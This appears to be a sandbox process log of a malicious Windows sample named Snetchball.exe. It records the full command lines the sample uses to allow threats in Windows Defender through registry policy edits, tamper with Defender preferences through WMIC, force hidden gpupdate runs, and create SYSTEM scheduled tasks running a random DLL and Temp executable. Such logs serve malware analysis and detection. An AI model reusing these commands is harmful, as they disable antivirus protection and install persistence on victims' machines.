"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3040 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3212 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3584 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4156 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dTyeYvmCU\RYNaSO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yoGdnYnzlZOyEUZ" /V1 /F
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iHAtfpaAUcCnRIDUD" /SC once /ST 00:18:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe\" O3 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yoGdnYnzlZOyEUZ2" /F /xml "C:\Program Files (x86)\dTyeYvmCU\bxbBWoA.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "iHAtfpaAUcCnRIDUD"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yoGdnYnzlZOyEUZ"
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe O3 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yoGdnYnzlZOyEUZ"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3208 -ip 3208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 804
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUjWiYKnFLBNBg" /F /xml "C:\Program Files (x86)\EJgSdoUbjkoU2\uGIAUQC.xml" /RU "SYSTEM"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe722ab58,0x7fffe722ab68,0x7fffe722ab78
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MXVPsGGZsUdpk2" /F /xml "C:\ProgramData\SFedefwyVZzcKDVB\MmHfcsE.xml" /RU "SYSTEM"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "prMGXFkeeUTMdhmNg2" /F /xml "C:\Program Files (x86)\rDAvgYGuVEIABXmxEhR\evPoJKx.xml" /RU "SYSTEM"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3000 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1964,i,8340138377787790728,944296292188319272,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
